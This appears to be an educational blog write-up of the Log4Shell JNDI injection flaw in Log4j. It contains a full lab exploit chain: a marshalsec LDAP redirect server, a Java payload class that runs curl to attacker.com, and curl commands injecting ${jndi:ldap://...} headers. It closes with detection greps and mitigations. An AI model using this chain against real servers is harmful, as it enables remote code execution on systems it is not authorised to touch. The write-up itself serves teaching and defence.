CVE Analysis — Log4Shell Pattern: A JNDI Injection Deep Dive

⚠️ Disclaimer: This article is for educational purposes only. Only test on systems you have explicit authorization to test.

Overview

Vulnerability Type: Remote Code Execution (RCE) via JNDI Injection Impact: Critical (CVSS 10.0) Affected Systems: Apache Log4j 2.0-beta9 to 2.14.1

How the Vulnerability Works

Understanding JNDI

JNDI (Java Naming and Directory Interface) is a Java API for connecting to directory services like LDAP.

The problem: Log4j would interpret user input and fetch external resources:

User-Agent: ${jndi:ldap://attacker.com/exploit}

When Log4j logged this value, it would:

See ${jndi:...}
Connect to the attacker’s LDAP server
Download and execute a malicious Java class!

Exploitation (Lab Environment Only)

Set Up Vulnerable Lab

docker pull ghcr.io/christophetd/log4shell-vulnerable-app
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app

LDAP Redirect Server

java -cp marshalsec-all.jar \
     marshalsec.jndi.LDAPRefServer "http://attacker-ip:8888/#Exploit"

Malicious Java Payload

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("curl attacker.com/callback");
        } catch (Exception e) { e.printStackTrace(); }
    }
}

javac Exploit.java
python3 -m http.server 8888

Trigger the Exploit

curl -H 'X-Api-Version: ${jndi:ldap://attacker.com:1389/exploit}' \
     http://target:8080/

curl -A '${jndi:ldap://attacker.com:1389/exploit}' http://target:8080/

Detection

# Search logs for exploitation attempts
grep -E '\$\{jndi:(ldap|rmi|dns|corba)://' /var/log/app/*.log

# Broader regex
grep -iE '\$\{[^\}]*j[^\}]*n[^\}]*d[^\}]*i[^\}]*:' /var/log/*.log

Mitigation

# Immediate — disable JNDI lookups
java -Dlog4j2.formatMsgNoLookups=true -jar application.jar

<!-- Permanent — update Log4j dependency -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.17.1</version>
</dependency>

Key Takeaways

Never trust external input in logging contexts
JNDI is dangerous in environments accepting user input
Maintain an asset inventory to know where Log4j is deployed
Virtual Patching (WAF rules) is critical for rapid response

Overview#

How the Vulnerability Works#

Understanding JNDI#

Exploitation (Lab Environment Only)#

Set Up Vulnerable Lab#

LDAP Redirect Server#

Malicious Java Payload#

Trigger the Exploit#

Detection#

Mitigation#

Key Takeaways#